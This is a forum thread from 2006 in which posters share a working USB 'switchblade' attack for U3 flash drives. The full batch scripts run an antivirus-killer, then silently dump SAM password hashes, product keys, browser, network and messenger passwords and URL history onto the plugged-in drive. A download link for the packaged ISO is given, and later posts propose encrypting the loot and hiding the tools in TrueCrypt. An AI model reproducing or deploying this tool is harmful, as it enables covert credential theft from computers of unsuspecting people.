djcool Posted December 10, 2006 Share Posted December 10, 2006 Ok letst start.I have the switchblade folder running on U3 partition.When i insert the usb flash it will copy the password etc to the otger flash partition.I created a simple comparation batch file , it seach for example DJCOOL.bmp in the root folder if its found it copy the content to that drive.I reamed SWITCHBLADE folder to U3. START.BAT @echo off if exist C:DJCOOL.bmp set CARD=C: if exist D:DJCOOL.bmp set CARD=D: if exist E:DJCOOL.bmp set CARD=E: if exist F:DJCOOL.bmp set CARD=F: if exist G:DJCOOL.bmp set CARD=G: if exist H:DJCOOL.bmp set CARD=H: if exist I:DJCOOL.bmp set CARD=I: if exist J:DJCOOL.bmp set CARD=J: if exist K:DJCOOL.bmp set CARD=K: if exist L:DJCOOL.bmp set CARD=L: if exist M:DJCOOL.bmp set CARD=M: if exist N:DJCOOL.bmp set CARD=N: if exist O:DJCOOL.bmp set CARD=O: if exist P:DJCOOL.bmp set CARD=P: if exist R:DJCOOL.bmp set CARD=R: if exist S:DJCOOL.bmp set CARD=S: if exist T:DJCOOL.bmp set CARD=T: if exist U:DJCOOL.bmp set CARD=U: if exist V:DJCOOL.bmp set CARD=V: if exist W:DJCOOL.bmp set CARD=W: if exist X:DJCOOL.bmp set CARD=X: if exist Y:DJCOOL.bmp set CARD=Y: if exist Z:DJCOOL.bmp set CARD=Z: nircmd.exe execmd CALL .avkill.exe nircmd.exe execmd CALL .go.bat nircmd.exe execmd CALL .progstart.bat GO.BAT @echo off if not exist %CARD%U3dump md %CARD%U3dump >nul if not exist %CARD%U3dump%computername% md %CARD%U3dump%computername% >nul cd U3tools >nul Echo ************************************ > %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[System info]************ >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %CARD%U3dump%computername%%computername%.log 2>&1 ipconfig /all >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 .pwdump.exe %computername% >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[Dump Product Keys]****** >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 .produkey /nosavereg /stext "%CARD%U3dump%computername%%computername%_pk.log" /remote %computername% >> %CARD%U3dump%computername%%computername%.log 2>&1 copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_pk.log* %CARD%U3dump%computername%%computername%.log >> nul del /f /q "%CARD%U3dump%computername%%computername%_pk.log" >nul Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[Dump IE7 secrets]******* >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 .iepv.exe /stext "%CARD%U3dump%computername%%computername%_ie7.log" >> %CARD%U3dump%computername%%computername%.log 2>&1 copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_ie7.log* %CARD%U3dump%computername%%computername%.log >> nul del /f /q "%CARD%U3dump%computername%%computername%_ie7.log" >nul Echo ************************************ >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1 echo ***********[Dump updates-list]******* >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1 .wul.exe /stext "%CARD%U3dump%computername%%computername%_LSA.log" >> %CARD%U3dump%computername%%computername%-updateslist.log 2>&1 copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_lsa.log* %CARD%U3dump%computername%%computername%-updateslist.log >> nul del /f /q "%CARD%U3dump%computername%%computername%_lsa.log" >nul Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[Dump Network PW]******** >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 .netpass.exe /stext "%CARD%U3dump%computername%%computername%_np.log" >> %CARD%U3dump%computername%%computername%.log 2>&1 copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_np.log* %CARD%U3dump%computername%%computername%.log >> nul del /f /q "%CARD%U3dump%computername%%computername%_np.log" >nul Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[Dump messenger PW]******** >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 .mspass.exe /stext "%CARD%U3dump%computername%%computername%_ms.log" >> %CARD%U3dump%computername%%computername%.log 2>&1 copy %CARD%U3dump%computername%%computername%.log+%CARD%U3dump%computername%%computername%_ms.log* %CARD%U3dump%computername%%computername%.log >> nul del /f /q "%CARD%U3dump%computername%%computername%_ms.log" >nul Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 echo ***********[Dump URL History]******* >> %CARD%U3dump%computername%%computername%.log 2>&1 Echo ************************************ >> %CARD%U3dump%computername%%computername%.log 2>&1 cscript //nologo .DUH.vbs >> %CARD%U3dump%computername%%computername%.log 2>&1 :End exit Here is my custom.iso don't forget to put a file called "DJCOOL.bmp" on the root of the flash disk! http://rapidshare.com/files/6925599/U3CUSTOM.rar PD:sorry for my english Quote Link to comment Share on other sites More sharing options...
djcool Posted December 11, 2006 Author Share Posted December 11, 2006 Lets get a step futher , at the end of the process there could be the DUMP folder compressed with rar and password protected and the original folder deleted. :D Quote Link to comment Share on other sites More sharing options...
kat Posted December 13, 2006 Share Posted December 13, 2006 or lets do it like so ... put in a smaller version of the U3 ISo ... IE take out the langunages and UPX the Files to make them smaller ... then add Truecrypt and a TC file that is mounted Readonly ... and runs the program and then umounts the drive ... I know the big draw back is truecrypt and the Admin but hey its something new here is the POC Download U3CUSTOM.ISO based on your DJCool just put generic "DJ" file in the Main U3 and your good to go ... Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.